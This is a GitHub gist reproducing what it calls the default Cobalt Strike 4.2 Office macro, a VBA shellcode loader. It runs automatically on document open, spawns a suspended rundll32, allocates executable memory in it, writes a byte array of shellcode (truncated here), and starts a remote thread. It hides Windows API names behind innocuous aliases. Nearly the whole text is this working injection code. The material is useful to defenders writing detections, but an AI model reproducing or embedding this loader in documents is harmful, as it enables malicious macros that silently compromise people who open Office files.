Created
February 3, 2021 20:05
-
-
Save magnusstubman/18397dfd4fc6d22892cd4ee183747ef7 to your computer and use it in GitHub Desktop.
Cobalt Strike 4.2 default macro
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Type PROCESS_INFORMATION | |
hProcess As Long | |
hThread As Long | |
dwProcessId As Long | |
dwThreadId As Long | |
End Type | |
Private Type STARTUPINFO | |
cb As Long | |
lpReserved As String | |
lpDesktop As String | |
lpTitle As String | |
dwX As Long | |
dwY As Long | |
dwXSize As Long | |
dwYSize As Long | |
dwXCountChars As Long | |
dwYCountChars As Long | |
dwFillAttribute As Long | |
dwFlags As Long | |
wShowWindow As Integer | |
cbReserved2 As Integer | |
lpReserved2 As Long | |
hStdInput As Long | |
hStdOutput As Long | |
hStdError As Long | |
End Type | |
#If VBA7 Then | |
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr | |
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr | |
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr | |
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long | |
#Else | |
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long | |
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long | |
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long | |
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long | |
#End If | |
Sub Auto_Open() | |
Dim myByte As Long, myArray As Variant, offset As Long | |
Dim pInfo As PROCESS_INFORMATION | |
Dim sInfo As STARTUPINFO | |
Dim sNull As String | |
Dim sProc As String | |
#If VBA7 Then | |
Dim rwxpage As LongPtr, res As LongPtr | |
#Else | |
Dim rwxpage As Long, res As Long | |
#End If | |
myArray = Array(-4,-24,8, ...) | |
If Len(Environ("ProgramW6432")) > 0 Then | |
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe" | |
Else | |
sProc = Environ("windir") & "\\System32\\rundll32.exe" | |
End If | |
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo) | |
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40) | |
For offset = LBound(myArray) To UBound(myArray) | |
myByte = myArray(offset) | |
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&) | |
Next offset | |
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0) | |
End Sub | |
Sub AutoOpen() | |
Auto_Open | |
End Sub | |
Sub Workbook_Open() | |
Auto_Open | |
End Sub | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment